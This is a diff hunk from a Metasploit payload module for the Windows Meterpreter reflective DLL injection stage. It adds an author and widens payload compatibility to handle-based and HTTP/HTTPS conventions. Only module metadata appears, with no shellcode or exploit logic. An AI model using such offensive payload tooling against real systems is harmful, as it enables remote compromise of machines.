@@ -23,8 +23,8 @@ module MetasploitModule
     super(update_info(info,
       'Name'          => 'Windows Meterpreter (Reflective Injection)',
       'Description'   => 'Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged)',
-      'Author'        => ['skape','sf'],
-      'PayloadCompat' => { 'Convention' => 'sockedi'},
+      'Author'        => ['skape', 'sf', 'OJ Reeves'],
+      'PayloadCompat' => { 'Convention' => 'sockedi handleedi http https'},
       'License'       => MSF_LICENSE,
       'Session'       => Msf::Sessions::Meterpreter_x86_Win
     ))
